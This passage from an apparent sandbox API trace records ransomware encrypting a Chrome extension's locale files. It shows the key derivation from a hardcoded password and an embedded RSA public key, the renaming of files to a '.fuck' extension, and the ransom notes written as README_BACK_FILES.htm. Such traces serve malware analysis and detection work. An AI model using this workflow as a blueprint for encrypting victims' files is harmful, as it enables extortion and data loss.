lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0x102, lpOverlapped=0x0) returned 1 [0250.554] CryptEncrypt (in: hKey=0x2985d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x102, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x110) returned 1 [0250.554] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x110, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x110, lpOverlapped=0x0) returned 1 [0250.554] CloseHandle (hObject=0x5d5c) returned 1 [0250.554] CloseHandle (hObject=0x5d58) returned 1 [0250.554] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), bFailIfExists=0) returned 1 [0250.559] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json", dwFileAttributes=0x0) returned 1 [0250.560] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.gsg")) returned 1 [0250.561] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\messages.json.fuck")) returned 1 [0250.562] CryptDestroyHash (hHash=0x2985ba0) returned 1 [0250.562] CryptDestroyKey (hKey=0x2985d20) returned 1 [0250.562] CryptReleaseContext (hProv=0x2988da8, dwFlags=0x0) returned 1 [0250.562] FindNextFileA (in: hFindFile=0x29858e0, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.562] FindClose (in: hFindFile=0x29858e0 | out: hFindFile=0x29858e0) returned 1 [0250.563] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\readme_back_files.htm")) returned 0xffffffff [0250.563] AreFileApisANSI () returned 1 [0250.563] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e4570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.563] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\lv\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.564] GetFileType (hFile=0x5d54) returned 0x1 [0250.564] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.566] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.566] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985820 [0250.567] FindNextFileA (in: hFindFile=0x2985820, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.567] FindNextFileA (in: hFindFile=0x2985820, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.567] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.567] GetLastError () returned 0x0 [0250.567] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json")) returned 0x20 [0250.567] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json", dwFileAttributes=0x80) returned 1 [0250.568] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.568] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.569] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.569] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2988a78) returned 1 [0250.572] CryptCreateHash (in: hProv=0x2988a78, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.572] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.572] CryptHashData (hHash=0x2985a60, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.572] CryptDeriveKey (in: hProv=0x2988a78, Algid=0x6610, hBaseData=0x2985a60, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2985d20) returned 1 [0250.572] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.572] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.572] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988fc8) returned 1 [0250.574] CryptImportPublicKeyInfo (in: hCryptProv=0x2988fc8, dwCertEncodingType=0x1, pInfo=0x2933b10*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933b40*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933b48*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x29858a0) returned 1 [0250.575] CryptEncrypt (in: hKey=0x29858a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.575] CryptEncrypt (in: hKey=0x29858a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2989050*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2989050*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.575] WriteFile (in: hFile=0x5d5c, lpBuffer=0x2989050*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2989050*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.576] ReadFile (in: hFile=0x5d58, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xfe, lpOverlapped=0x0) returned 1 [0250.578] CryptEncrypt (in: hKey=0x2985d20, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xfe, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.578] WriteFile (in: hFile=0x5d5c, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.578] CloseHandle (hObject=0x5d58) returned 1 [0250.578] CloseHandle (hObject=0x5d5c) returned 1 [0250.578] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), bFailIfExists=0) returned 1 [0250.582] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json", dwFileAttributes=0x0) returned 1 [0250.583] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.gsg")) returned 1 [0250.584] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\messages.json.fuck")) returned 1 [0250.585] CryptDestroyHash (hHash=0x2985a60) returned 1 [0250.585] CryptDestroyKey (hKey=0x2985d20) returned 1 [0250.585] CryptReleaseContext (hProv=0x2988a78, dwFlags=0x0) returned 1 [0250.586] FindNextFileA (in: hFindFile=0x2985820, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.586] FindClose (in: hFindFile=0x2985820 | out: hFindFile=0x2985820) returned 1 [0250.586] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\readme_back_files.htm")) returned 0xffffffff [0250.586] AreFileApisANSI () returned 1 [0250.586] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.586] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\ms\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d54 [0250.587] GetFileType (hFile=0x5d54) returned 0x1 [0250.587] WriteFile (in: hFile=0x5d54, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0250.589] FindNextFileA (in: hFindFile=0x29387b8, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0250.589] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2985d20 [0250.589] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.589] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0250.589] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0250.590] GetLastError () returned 0x0 [0250.590] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json")) returned 0x20 [0250.590] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0250.590] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0250.591] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d58 [0250.593] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0250.593] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x29890d8) returned 1 [0250.596] CryptCreateHash (in: hProv=0x29890d8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0250.596] lstrlenA (lpString="dKFUHQAZHTBtFXQUaXBopKFNzMlQm") returned 29 [0250.596] CryptHashData (hHash=0x2985d60, pbData=0x28cb5a8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0250.596] CryptDeriveKey (in: hProv=0x29890d8, Algid=0x6610, hBaseData=0x2985d60, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x29858e0) returned 1 [0250.596] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----h", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0250.596] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0250.596] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2988638) returned 1 [0250.597] CryptImportPublicKeyInfo (in: hCryptProv=0x2988638, dwCertEncodingType=0x1, pInfo=0x2933be0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2933c10*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2933c18*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2985e60) returned 1 [0250.597] CryptEncrypt (in: hKey=0x2985e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0250.597] CryptEncrypt (in: hKey=0x2985e60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2988da8*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2988da8*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0250.597] WriteFile (in: hFile=0x5d58, lpBuffer=0x2988da8*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2988da8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0250.598] ReadFile (in: hFile=0x5d5c, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesRead=0x2b9bc5c*=0xf2, lpOverlapped=0x0) returned 1 [0250.600] CryptEncrypt (in: hKey=0x29858e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0xf2, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9bc5c*=0x100) returned 1 [0250.600] WriteFile (in: hFile=0x5d58, lpBuffer=0x27792e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8*, lpNumberOfBytesWritten=0x2b9bc5c*=0x100, lpOverlapped=0x0) returned 1 [0250.600] CloseHandle (hObject=0x5d5c) returned 1 [0250.600] CloseHandle (hObject=0x5d58) returned 1 [0250.600] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), bFailIfExists=0) returned 1 [0250.604] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json", dwFileAttributes=0x0) returned 1 [0250.605] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.gsg")) returned 1 [0250.606] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\messages.json.fuck")) returned 1 [0250.608] CryptDestroyHash (hHash=0x2985d60) returned 1 [0250.608] CryptDestroyKey (hKey=0x29858e0) returned 1 [0250.608] CryptReleaseContext (hProv=0x29890d8, dwFlags=0x0) returned 1 [0250.608] FindNextFileA (in: hFindFile=0x2985d20, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0250.608] FindClose (in: hFindFile=0x2985d20 | out: hFindFile=0x2985d20) returned 1 [0250.608] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\apdfllckaahabafndbhieahigkjlhalf\\14.1_0\\_locales\\nl\\readme_back_files.htm")) returned 0xffffffff [0250.608] AreFileApisANSI () returned 1 [0250.608] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e3850, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 154 [0250.608] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 